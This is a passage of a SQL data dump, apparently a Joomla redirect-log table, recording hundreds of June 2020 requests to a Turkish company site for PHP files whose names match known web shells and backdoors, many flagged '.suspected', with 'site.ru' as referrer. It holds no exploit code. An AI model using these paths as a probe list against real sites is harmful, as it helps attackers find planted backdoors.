00:00:00',301),(25162,'http://3s-technologies.com.tr/tr/libraries/libraries.php',NULL,'http://site.ru','',6,0,'2020-06-28 04:16:32','0000-00-00 00:00:00',301),(25163,'http://3s-technologies.com.tr/tr/www/argo/tmp/config.php',NULL,'http://site.ru','',2,0,'2020-06-28 04:43:44','0000-00-00 00:00:00',301),(25164,'http://3s-technologies.com.tr/tr/includes/xmlrpc.php',NULL,'http://site.ru','',1,0,'2020-06-28 04:44:08','0000-00-00 00:00:00',301),(25165,'http://3s-technologies.com.tr/tr/iomsiiyyta.php',NULL,'http://site.ru','',2,0,'2020-06-28 04:44:30','0000-00-00 00:00:00',301),(25166,'http://3s-technologies.com.tr/tr/media/system/media.php',NULL,'http://site.ru','',2,0,'2020-06-28 04:44:32','0000-00-00 00:00:00',301),(25167,'http://3s-technologies.com.tr/tr/libraries/cms/response/media-admin.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 05:11:52','0000-00-00 00:00:00',301),(25168,'http://3s-technologies.com.tr/tr/libraries/joomla/template/module/modifier/feal.php',NULL,'http://site.ru','',1,0,'2020-06-28 05:12:20','0000-00-00 00:00:00',301),(25169,'http://3s-technologies.com.tr/tr/templates/beez3/html/layouts/beautifu.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 05:12:41','0000-00-00 00:00:00',301),(25170,'http://3s-technologies.com.tr/tr/plugins/captcha/.h..php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 05:12:41','0000-00-00 00:00:00',301),(25171,'http://3s-technologies.com.tr/tr/templates/beez3/images/personal/streamed.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 05:12:41','0000-00-00 00:00:00',301),(25172,'http://3s-technologies.com.tr/tr/tmp/install_505b916e48aa2/el-gr/apps/page/language/wp-update.php',NULL,'http://site.ru','',2,0,'2020-06-28 05:12:57','0000-00-00 00:00:00',301),(25173,'http://3s-technologies.com.tr/tr/modules/go.php',NULL,'http://site.ru','',1,0,'2020-06-28 05:13:05','0000-00-00 00:00:00',301),(25174,'http://3s-technologies.com.tr/tr/test2.php',NULL,'http://site.ru','',9,0,'2020-06-28 05:40:27','0000-00-00 00:00:00',301),(25175,'http://3s-technologies.com.tr/tr/oldversionbct/doc.php',NULL,'http://site.ru','',2,0,'2020-06-28 05:40:31','0000-00-00 00:00:00',301),(25176,'http://3s-technologies.com.tr/tr/tmp/404.php',NULL,'http://site.ru','',2,0,'2020-06-28 06:07:46','0000-00-00 00:00:00',301),(25177,'http://3s-technologies.com.tr/tr/libraries/data.php',NULL,'http://site.ru','',2,0,'2020-06-28 06:08:13','0000-00-00 00:00:00',301),(25178,'http://3s-technologies.com.tr/tr/options/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:08:50','0000-00-00 00:00:00',301),(25179,'http://3s-technologies.com.tr/tr/templates/beez3/html/mod_login/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:09:23','0000-00-00 00:00:00',301),(25180,'http://3s-technologies.com.tr/tr/options/wsa.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:09:27','0000-00-00 00:00:00',301),(25181,'http://3s-technologies.com.tr/tr/tmp/com_csvi/bag.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:09:44','0000-00-00 00:00:00',301),(25182,'http://3s-technologies.com.tr/tr/libraries/fof/toolbar/feal.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:41:01','0000-00-00 00:00:00',301),(25183,'http://3s-technologies.com.tr/tr/libraries/fof/autoloader/home.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 06:41:26','0000-00-00 00:00:00',301),(25184,'http://3s-technologies.com.tr/tr/kinasportswear.com/wp-catcha.php',NULL,'http://site.ru','',1,0,'2020-06-28 06:41:55','0000-00-00 00:00:00',301),(25185,'http://3s-technologies.com.tr/tr/wp-user.php',NULL,'http://site.ru','',7,0,'2020-06-28 07:12:28','0000-00-00 00:00:00',301),(25186,'http://3s-technologies.com.tr/tr/templates/protostar/less/.h..php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 07:12:42','0000-00-00 00:00:00',301),(25187,'http://3s-technologies.com.tr/tr/o.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 07:13:19','0000-00-00 00:00:00',301),(25188,'http://3s-technologies.com.tr/tr/libraries/pattemplate/.h..php',NULL,'http://site.ru','',1,0,'2020-06-28 07:44:49','0000-00-00 00:00:00',301),(25189,'http://3s-technologies.com.tr/tr/libraries/phpass/wp-side.php',NULL,'http://site.ru','',2,0,'2020-06-28 07:45:04','0000-00-00 00:00:00',301),(25190,'http://3s-technologies.com.tr/tr/libraries/phpmailer/language/wp-cofigs.php',NULL,'http://site.ru','',2,0,'2020-06-28 07:45:11','0000-00-00 00:00:00',301),(25191,'http://3s-technologies.com.tr/tr/tmp/install_5eb717fa1faba/mod_slidethemall_joomla3/doc.php',NULL,'http://site.ru','',1,0,'2020-06-28 08:12:06','0000-00-00 00:00:00',301),(25192,'http://3s-technologies.com.tr/tr/nsgin.com/cache/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-28 08:12:46','0000-00-00 00:00:00',301),(25193,'http://3s-technologies.com.tr/tr/test/maint/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-28 08:13:05','0000-00-00 00:00:00',301),(25194,'http://3s-technologies.com.tr/tr/media/editors/tinymce/plugins/visualblocks/css/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 08:13:37','0000-00-00 00:00:00',301),(25195,'http://3s-technologies.com.tr/tr/libraries/fof/dispatcher/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 08:43:48','0000-00-00 00:00:00',301),(25196,'http://3s-technologies.com.tr/tr/modules/mod_activesynmasterkey/doc.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 09:16:40','0000-00-00 00:00:00',301),(25197,'http://3s-technologies.com.tr/tr/language/en-gb/en-gb.mod_door.php',NULL,'http://site.ru','',2,0,'2020-06-28 09:46:41','0000-00-00 00:00:00',301),(25198,'http://3s-technologies.com.tr/tr/libraries/fof/utils/installscript/feal.php',NULL,'http://site.ru','',2,0,'2020-06-28 09:47:10','0000-00-00 00:00:00',301),(25199,'http://3s-technologies.com.tr/tr/libraries/joomla/template/popup-pompop.php',NULL,'http://site.ru','',1,0,'2020-06-28 10:18:04','0000-00-00 00:00:00',301),(25200,'http://3s-technologies.com.tr/tr/media/media/css/sec.php',NULL,'http://site.ru','',1,0,'2020-06-28 10:49:04','0000-00-00 00:00:00',301),(25201,'http://3s-technologies.com.tr/tr/libraries/phpinputfilter/feter.php',NULL,'http://site.ru','',1,0,'2020-06-28 10:50:04','0000-00-00 00:00:00',301),(25202,'http://3s-technologies.com.tr/tr/templates/beez3/images/system/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 11:19:33','0000-00-00 00:00:00',301),(25203,'http://3s-technologies.com.tr/tr/media/system/css/mini.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 11:20:57','0000-00-00 00:00:00',301),(25204,'http://3s-technologies.com.tr/tr/libraries/domit/wp-logos.php',NULL,'http://site.ru','',1,0,'2020-06-28 11:25:18','0000-00-00 00:00:00',301),(25205,'http://3s-technologies.com.tr/tr/modules/mod_articles_categories/tmpl/wp-side.php',NULL,'http://site.ru','',1,0,'2020-06-28 11:25:24','0000-00-00 00:00:00',301),(25206,'http://3s-technologies.com.tr/tr/libraries/404.php',NULL,'http://site.ru','',1,0,'2020-06-28 12:28:08','0000-00-00 00:00:00',301),(25207,'http://3s-technologies.com.tr/tr/mod/includes/plugins/infossagradas/includes.php',NULL,'http://site.ru','',1,0,'2020-06-28 12:29:20','0000-00-00 00:00:00',301),(25208,'http://3s-technologies.com.tr/tr/xmlrpc/includes/includes.php',NULL,'http://site.ru','',2,0,'2020-06-28 12:57:24','0000-00-00 00:00:00',301),(25209,'http://3s-technologies.com.tr/tr/language/admin.php',NULL,'http://site.ru','',1,0,'2020-06-28 12:57:48','0000-00-00 00:00:00',301),(25210,'http://3s-technologies.com.tr/tr/jorda1.php',NULL,'http://site.ru','',4,0,'2020-06-28 12:57:56','0000-00-00 00:00:00',301),(25211,'http://3s-technologies.com.tr/tr/media/arfat2.php',NULL,'http://site.ru','',1,0,'2020-06-28 12:57:59','0000-00-00 00:00:00',301),(25212,'http://3s-technologies.com.tr/tr/templates/system/css/class.php',NULL,'http://site.ru','',1,0,'2020-06-28 12:58:01','0000-00-00 00:00:00',301),(25213,'http://3s-technologies.com.tr/tr/menus/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-28 13:29:30','0000-00-00 00:00:00',301),(25214,'http://3s-technologies.com.tr/tr/layouts/joomla/edit/dz.php',NULL,'http://site.ru','',2,0,'2020-06-28 13:29:57','0000-00-00 00:00:00',301),(25215,'http://3s-technologies.com.tr/tr/libraries/joomla/template/123.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 13:30:21','0000-00-00 00:00:00',301),(25216,'http://3s-technologies.com.tr/tr/libraries/phpinputfilter/hell.php',NULL,'http://site.ru','',4,0,'2020-06-28 13:57:01','0000-00-00 00:00:00',301),(25217,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_weblinks/form/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 13:59:08','0000-00-00 00:00:00',301),(25218,'http://3s-technologies.com.tr/tr/includes/wp-aespa.php',NULL,'http://site.ru','',3,0,'2020-06-28 14:26:43','0000-00-00 00:00:00',301),(25219,'http://3s-technologies.com.tr/tr/libraries/phpmailer/language/content-post.php',NULL,'http://site.ru','',3,0,'2020-06-28 14:38:15','0000-00-00 00:00:00',301),(25220,'http://3s-technologies.com.tr/tr/local.php',NULL,'http://site.ru','',15,0,'2020-06-28 14:59:10','0000-00-00 00:00:00',301),(25221,'http://3s-technologies.com.tr/tr/layouts/joomla/html/batch/media-admin.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 14:59:20','0000-00-00 00:00:00',301),(25222,'http://3s-technologies.com.tr/tr/nsgin.com/wp-plugins.php',NULL,'http://site.ru','',1,0,'2020-06-28 15:29:48','0000-00-00 00:00:00',301),(25223,'http://3s-technologies.com.tr/tr/media/editors/tinymce/jscripts/tiny_mce/themes/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-28 15:57:49','0000-00-00 00:00:00',301),(25224,'http://3s-technologies.com.tr/tr/wp/shx.php',NULL,'http://site.ru','',1,0,'2020-06-28 15:58:37','0000-00-00 00:00:00',301),(25225,'http://3s-technologies.com.tr/tr/libraries/pear/archive_tar/int123.php',NULL,'http://site.ru','',1,0,'2020-06-28 15:58:37','0000-00-00 00:00:00',301),(25226,'http://3s-technologies.com.tr/tr/oldversionbct/ajax.php',NULL,'http://site.ru','',1,0,'2020-06-28 15:58:57','0000-00-00 00:00:00',301),(25227,'http://3s-technologies.com.tr/tr/layouts/joomla/system/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-28 16:26:34','0000-00-00 00:00:00',301),(25228,'http://3s-technologies.com.tr/tr/templates/beez3/home.php',NULL,'http://site.ru','',3,0,'2020-06-28 17:06:19','0000-00-00 00:00:00',301),(25229,'http://3s-technologies.com.tr/tr/administrator/components/com_rsform/views/formajax/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-28 17:06:23','0000-00-00 00:00:00',301),(25230,'http://3s-technologies.com.tr/tr/templates/beez3/html/bag.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-28 17:06:39','0000-00-00 00:00:00',301),(25231,'http://3s-technologies.com.tr/tr/bin/coredata2274d6t2.php',NULL,'http://site.ru','',1,0,'2020-06-28 17:06:48','0000-00-00 00:00:00',301),(25232,'http://3s-technologies.com.tr/tr/qm0dec.php',NULL,'http://site.ru','',4,0,'2020-06-28 17:13:01','0000-00-00 00:00:00',301),(25233,'http://3s-technologies.com.tr/tr/wp-1login_bac.php',NULL,'http://site.ru','',2,0,'2020-06-28 17:35:43','0000-00-00 00:00:00',301),(25234,'http://3s-technologies.com.tr/tr/administrator/profile.php',NULL,'http://site.ru','',1,0,'2020-06-28 17:35:46','0000-00-00 00:00:00',301),(25235,'http://3s-technologies.com.tr/tr/weqqglgwwd.php',NULL,'http://site.ru','',2,0,'2020-06-28 18:03:34','0000-00-00 00:00:00',301),(25236,'http://3s-technologies.com.tr/tr/administrator/components/com_finder/helpers/wp-ping.php',NULL,'http://site.ru','',1,0,'2020-06-28 18:03:54','0000-00-00 00:00:00',301),(25237,'http://3s-technologies.com.tr/tr/administrator/components/com_rsform/views/submissions/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-28 18:04:11','0000-00-00 00:00:00',301),(25238,'http://3s-technologies.com.tr/tr/plugins/quickicon/joomlaupdate/data.php',NULL,'http://site.ru','',1,0,'2020-06-28 18:05:21','0000-00-00 00:00:00',301),(25239,'http://3s-technologies.com.tr/tr/zzz.php',NULL,'http://site.ru','',9,0,'2020-06-28 18:31:02','0000-00-00 00:00:00',301),(25240,'http://3s-technologies.com.tr/tr/administrator/components/com_redirect/views/links/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-28 18:31:16','0000-00-00 00:00:00',301),(25241,'http://3s-technologies.com.tr/tr/templates/ajt005_j30/bookmark.php',NULL,'http://site.ru','',1,0,'2020-06-28 18:58:42','0000-00-00 00:00:00',301),(25242,'http://3s-technologies.com.tr/tr/wkntqx.php',NULL,'http://site.ru','',2,0,'2020-06-28 18:58:43','0000-00-00 00:00:00',301),(25243,'http://3s-technologies.com.tr/tr/tnvgoyekbr.php',NULL,'http://site.ru','',2,0,'2020-06-28 18:59:09','0000-00-00 00:00:00',301),(25244,'http://3s-technologies.com.tr/tr/quarantine_h2144/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-28 18:59:28','0000-00-00 00:00:00',301),(25245,'http://3s-technologies.com.tr/tr/xmlrpc/robots.txt.php',NULL,'http://site.ru','',1,0,'2020-06-28 18:59:40','0000-00-00 00:00:00',301),(25246,'http://3s-technologies.com.tr/tr/quarantine_h2144/blackhat.php',NULL,'http://site.ru','',3,0,'2020-06-28 19:24:17','0000-00-00 00:00:00',301),(25247,'http://3s-technologies.com.tr/tr/administrator/components/simpleside.php5.suspected',NULL,'http://site.ru','',1,0,'2020-06-28 19:24:51','0000-00-00 00:00:00',301),(25248,'http://3s-technologies.com.tr/tr/administrator/components/components.php',NULL,'http://site.ru','',1,0,'2020-06-28 19:25:52','0000-00-00 00:00:00',301),(25249,'http://3s-technologies.com.tr/tr/plugins1/editors/tinymce/jscripts/tiny_mce/themes/advanced/langs/feter.php',NULL,'http://site.ru','',3,0,'2020-06-28 19:53:16','0000-00-00 00:00:00',301),(25250,'http://3s-technologies.com.tr/tr/plugins/system/debug/deep.php',NULL,'http://site.ru','',1,0,'2020-06-28 19:53:37','0000-00-00 00:00:00',301),(25251,'http://3s-technologies.com.tr/tr/cache/auto.php',NULL,'http://site.ru','',4,0,'2020-06-28 20:20:24','0000-00-00 00:00:00',301),(25252,'http://3s-technologies.com.tr/tr/plugins/system/jsnframework/assets/3rd-party/jquery-zeroclipboard/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:21:22','0000-00-00 00:00:00',301),(25253,'http://3s-technologies.com.tr/tr/administrator/components/com_acymailing/extensions/plg_editors_acyeditor/acyeditor/ckeditor/plugins/clipboard/dialogs/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:27:58','0000-00-00 00:00:00',301),(25254,'http://3s-technologies.com.tr/tr/administrator/modules/mod_imageshow_quickicon/tmpl/.helperty.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:46:42','0000-00-00 00:00:00',301),(25255,'http://3s-technologies.com.tr/tr/wp-crash.php',NULL,'http://site.ru','',2,0,'2020-06-28 20:48:04','0000-00-00 00:00:00',301),(25256,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_content/featured/data.php',NULL,'http://site.ru','',4,0,'2020-06-28 21:41:26','0000-00-00 00:00:00',301),(25257,'http://3s-technologies.com.tr/tr/img/img.php',NULL,'http://site.ru','',5,0,'2020-06-28 21:42:25','0000-00-00 00:00:00',301),(25258,'http://3s-technologies.com.tr/tr/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/directionality/feter.php',NULL,'http://site.ru','',1,0,'2020-06-28 22:09:53','0000-00-00 00:00:00',301),(25259,'http://3s-technologies.com.tr/tr/wp-dbs.php',NULL,'http://site.ru','',2,0,'2020-06-28 22:10:01','0000-00-00 00:00:00',301),(25260,'http://3s-technologies.com.tr/tr/plugins/system/helix3/core/configure.php',NULL,'http://site.ru','',1,0,'2020-06-28 22:10:41','0000-00-00 00:00:00',301),(25261,'http://3s-technologies.com.tr/tr/zxpcis.php',NULL,'http://site.ru','',3,0,'2020-06-28 22:42:30','0000-00-00 00:00:00',301),(25262,'http://3s-technologies.com.tr/tr/administrator/tyt.php',NULL,'http://site.ru','',3,0,'2020-06-28 23:08:18','0000-00-00 00:00:00',301),(25263,'http://3s-technologies.com.tr/tr/administrator/templates/isis/less/bootstrap/wp-blog.php',NULL,'http://site.ru','',1,0,'2020-06-28 23:09:14','0000-00-00 00:00:00',301),(25264,'http://3s-technologies.com.tr/tr/templates/beez/wp-muen.php',NULL,'http://site.ru','',1,0,'2020-06-28 23:09:30','0000-00-00 00:00:00',301),(25265,'http://3s-technologies.com.tr/tr/lonteku.php',NULL,'http://site.ru','',2,0,'2020-06-28 23:09:41','0000-00-00 00:00:00',301),(25266,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_content/categories/wp-side.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 23:37:31','0000-00-00 00:00:00',301),(25267,'http://3s-technologies.com.tr/tr/cache/2001981.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-28 23:37:50','0000-00-00 00:00:00',301),(25268,'http://3s-technologies.com.tr/tr/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/paste/images/feter.php',NULL,'http://site.ru','',1,0,'2020-06-28 23:37:54','0000-00-00 00:00:00',301),(25269,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/libraries/3rd-party/httpclient/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 00:06:08','0000-00-00 00:00:00',301),(25270,'http://3s-technologies.com.tr/tr/administrator/components/com_templates/views/feal.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 00:33:48','0000-00-00 00:00:00',301),(25271,'http://3s-technologies.com.tr/tr/zb.php',NULL,'http://site.ru','',2,0,'2020-06-29 00:33:58','0000-00-00 00:00:00',301),(25272,'http://3s-technologies.com.tr/tr/ymihympfbq.php',NULL,'http://site.ru','',3,0,'2020-06-29 00:33:58','0000-00-00 00:00:00',301),(25273,'http://3s-technologies.com.tr/tr/bin/corecore71.php',NULL,'http://site.ru','',2,0,'2020-06-29 01:01:17','0000-00-00 00:00:00',301),(25274,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/mod_quickicon/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 01:01:18','0000-00-00 00:00:00',301),(25275,'http://3s-technologies.com.tr/tr/v8cvoj.php',NULL,'http://site.ru','',1,0,'2020-06-29 01:01:24','0000-00-00 00:00:00',301),(25276,'http://3s-technologies.com.tr/tr/administrator/components/com_acepolls/views/votes/media-admin.php',NULL,'http://site.ru','',3,0,'2020-06-29 01:02:13','0000-00-00 00:00:00',301),(25277,'http://3s-technologies.com.tr/tr/templates/rhuk_milkyway/html/editor.php',NULL,'http://site.ru','',3,0,'2020-06-29 01:02:56','0000-00-00 00:00:00',301),(25278,'http://3s-technologies.com.tr/tr/xxxx.php',NULL,'http://site.ru','',49,0,'2020-06-29 01:28:21','0000-00-00 00:00:00',301),(25279,'http://3s-technologies.com.tr/tr/alfa3.php',NULL,'http://site.ru','',2,0,'2020-06-29 01:28:23','0000-00-00 00:00:00',301),(25280,'http://3s-technologies.com.tr/tr/templates/beez/ic.php',NULL,'http://site.ru','',1,0,'2020-06-29 01:28:48','0000-00-00 00:00:00',301),(25281,'http://3s-technologies.com.tr/tr/bin/wp-log.php',NULL,'http://site.ru','',1,0,'2020-06-29 01:54:33','0000-00-00 00:00:00',301),(25282,'http://3s-technologies.com.tr/tr/templates/ambient/css/font-awesome/bag.php',NULL,'http://site.ru','',1,0,'2020-06-29 01:54:44','0000-00-00 00:00:00',301),(25283,'http://3s-technologies.com.tr/tr/administrator/components/com_acepolls/views/votes/tmpl/ex_liner.php',NULL,'http://site.ru','',1,0,'2020-06-29 01:55:23','0000-00-00 00:00:00',301),(25284,'http://3s-technologies.com.tr/tr/administrator/modules/mod_login/index.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 02:21:15','0000-00-00 00:00:00',301),(25285,'http://3s-technologies.com.tr/tr/administrator/modules/mod_login/index.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 02:21:15','0000-00-00 00:00:00',301),(25286,'http://3s-technologies.com.tr/tr/administrator/modules/mod_login/index.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 02:21:15','0000-00-00 00:00:00',301),(25287,'http://3s-technologies.com.tr/tr/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/example/js/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-29 02:22:03','0000-00-00 00:00:00',301),(25288,'http://3s-technologies.com.tr/tr/ponce7/ponce7.php',NULL,'http://site.ru','',1,0,'2020-06-29 02:22:56','0000-00-00 00:00:00',301),(25289,'http://3s-technologies.com.tr/tr/plugins/system/languagecode/language/en-gb/wp-side.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 02:46:51','0000-00-00 00:00:00',301),(25290,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/views/phocagalleryraimg/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-29 02:47:09','0000-00-00 00:00:00',301),(25291,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/libraries/phocagallery/youtube/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 02:47:18','0000-00-00 00:00:00',301),(25292,'http://3s-technologies.com.tr/tr/_media/sitemps.php',NULL,'http://site.ru','',1,0,'2020-06-29 02:47:52','0000-00-00 00:00:00',301),(25293,'http://3s-technologies.com.tr/tr/a99d.php',NULL,'http://site.ru','',3,0,'2020-06-29 02:50:06','0000-00-00 00:00:00',301),(25294,'http://3s-technologies.com.tr/tr/bin/bin.php',NULL,'http://site.ru','',1,0,'2020-06-29 03:13:55','0000-00-00 00:00:00',301),(25295,'http://3s-technologies.com.tr/tr/blnvqechaa.php',NULL,'http://site.ru','',3,0,'2020-06-29 03:14:04','0000-00-00 00:00:00',301),(25296,'http://3s-technologies.com.tr/tr/poub/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87.php',NULL,'http://site.ru','',2,0,'2020-06-29 03:40:21','0000-00-00 00:00:00',301),(25297,'http://3s-technologies.com.tr/tr/webmap.php',NULL,'http://site.ru','',4,0,'2020-06-29 03:40:24','0000-00-00 00:00:00',301),(25298,'http://3s-technologies.com.tr/tr/webmap.php',NULL,'http://site.ru','',1,0,'2020-06-29 03:40:24','0000-00-00 00:00:00',301),(25299,'http://3s-technologies.com.tr/tr/public/hebadge_pagebadge/00/.h..php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 03:40:55','0000-00-00 00:00:00',301),(25300,'http://3s-technologies.com.tr/tr/ajax.php',NULL,'http://site.ru','',22,0,'2020-06-29 03:41:02','0000-00-00 00:00:00',301),(25301,'http://3s-technologies.com.tr/tr/plugins1/editors/tinymce/jscripts/tiny_mce/plugins/emotions/ob.php',NULL,'http://site.ru','',1,0,'2020-06-29 03:41:18','0000-00-00 00:00:00',301),(25302,'http://3s-technologies.com.tr/tr/sad.php',NULL,'http://site.ru','',12,0,'2020-06-29 03:44:37','0000-00-00 00:00:00',301),(25303,'http://3s-technologies.com.tr/tr/plugins1/system/legacy/feter.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:06:12','0000-00-00 00:00:00',301),(25304,'http://3s-technologies.com.tr/tr/greens.php',NULL,'http://site.ru','',5,0,'2020-06-29 04:06:20','0000-00-00 00:00:00',301),(25305,'http://3s-technologies.com.tr/tr/administrator/components/com_komento/assets/server.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:06:28','0000-00-00 00:00:00',301),(25306,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_contact/categories/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:33:42','0000-00-00 00:00:00',301),(25307,'http://3s-technologies.com.tr/tr/site/components/com_media/mark.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:33:42','0000-00-00 00:00:00',301),(25308,'http://3s-technologies.com.tr/tr/templates/atomic/css/templatew.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:33:43','0000-00-00 00:00:00',301),(25309,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_content/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:33:49','0000-00-00 00:00:00',301),(25310,'http://3s-technologies.com.tr/tr/wp-block.php',NULL,'http://site.ru','',27,0,'2020-06-29 04:34:33','0000-00-00 00:00:00',301),(25311,'http://3s-technologies.com.tr/tr/plugins/system/jsnframework/libraries/joomlashine/upgrade/htaccess.php',NULL,'http://site.ru','',3,0,'2020-06-29 04:34:58','0000-00-00 00:00:00',301),(25312,'http://3s-technologies.com.tr/tr/plugins/jsnimageshow/themeclassic/assets/js/galleria/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 04:36:26','0000-00-00 00:00:00',301),(25313,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/feter.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:01:57','0000-00-00 00:00:00',301),(25314,'http://3s-technologies.com.tr/tr/_resources/sitemps.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:02:12','0000-00-00 00:00:00',301),(25315,'http://3s-technologies.com.tr/tr/t9lbiw.php',NULL,'http://site.ru','',2,0,'2020-06-29 05:02:19','0000-00-00 00:00:00',301),(25316,'http://3s-technologies.com.tr/tr/administrator/components/com_acymailing/extensions/plg_editors_acyeditor/acyeditor/ckeditor/plugins/tabletools/dialogs/ix.php.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:02:29','0000-00-00 00:00:00',301),(25317,'http://3s-technologies.com.tr/tr/administrator/components/com_languages/views/overrides/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-29 05:08:50','0000-00-00 00:00:00',301),(25318,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_newsfeeds/category/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:29:54','0000-00-00 00:00:00',301),(25319,'http://3s-technologies.com.tr/tr/plugins/system/system.php',NULL,'http://site.ru','',7,0,'2020-06-29 05:30:02','0000-00-00 00:00:00',301),(25320,'http://3s-technologies.com.tr/tr/administrator/components/com_modules/views/preview/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:57:23','0000-00-00 00:00:00',301),(25321,'http://3s-technologies.com.tr/tr/templates/ambient/cache/beautifu.php',NULL,'http://site.ru','',1,0,'2020-06-29 05:58:23','0000-00-00 00:00:00',301),(25322,'http://3s-technologies.com.tr/tr/style_.php',NULL,'http://site.ru','',3,0,'2020-06-29 05:58:36','0000-00-00 00:00:00',301),(25323,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_contact/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 06:25:38','0000-00-00 00:00:00',301),(25324,'http://3s-technologies.com.tr/tr/buptmcrups.php',NULL,'http://site.ru','',3,0,'2020-06-29 06:26:21','0000-00-00 00:00:00',301),(25325,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/gank.php.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-29 07:21:29','0000-00-00 00:00:00',301),(25326,'http://3s-technologies.com.tr/tr/cache/zeroshell.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:22:04','0000-00-00 00:00:00',301),(25327,'http://3s-technologies.com.tr/tr/components/com_fileman/template/menus.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:22:40','0000-00-00 00:00:00',301),(25328,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/helpers/html/ycirqz.php',NULL,'http://site.ru','',1,0,'2020-06-29 07:22:46','0000-00-00 00:00:00',301),(25329,'http://3s-technologies.com.tr/tr/cache/ghjk.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 07:23:20','0000-00-00 00:00:00',301),(25330,'http://3s-technologies.com.tr/tr/components/com_contact/views/featured/tmpl/.hello.php',NULL,'http://site.ru','',3,0,'2020-06-29 07:51:31','0000-00-00 00:00:00',301),(25331,'http://3s-technologies.com.tr/tr/components/com_jce/editor/tiny_mce/plugins/advlist/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-29 08:19:07','0000-00-00 00:00:00',301),(25332,'http://3s-technologies.com.tr/tr/components/com_jce/editor/libraries/css/jquery/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-29 08:19:55','0000-00-00 00:00:00',301),(25333,'http://3s-technologies.com.tr/tr/images/eventgallery/licensed.php',NULL,'http://site.ru','',1,0,'2020-06-29 08:20:09','0000-00-00 00:00:00',301),(25334,'http://3s-technologies.com.tr/tr/domains/bepo.eu/simple.php5.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 08:48:39','0000-00-00 00:00:00',301),(25335,'http://3s-technologies.com.tr/tr/images/wp-muen.php',NULL,'http://site.ru','',1,0,'2020-06-29 08:49:01','0000-00-00 00:00:00',301),(25336,'http://3s-technologies.com.tr/tr/plugins/search/weblinks/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 09:16:45','0000-00-00 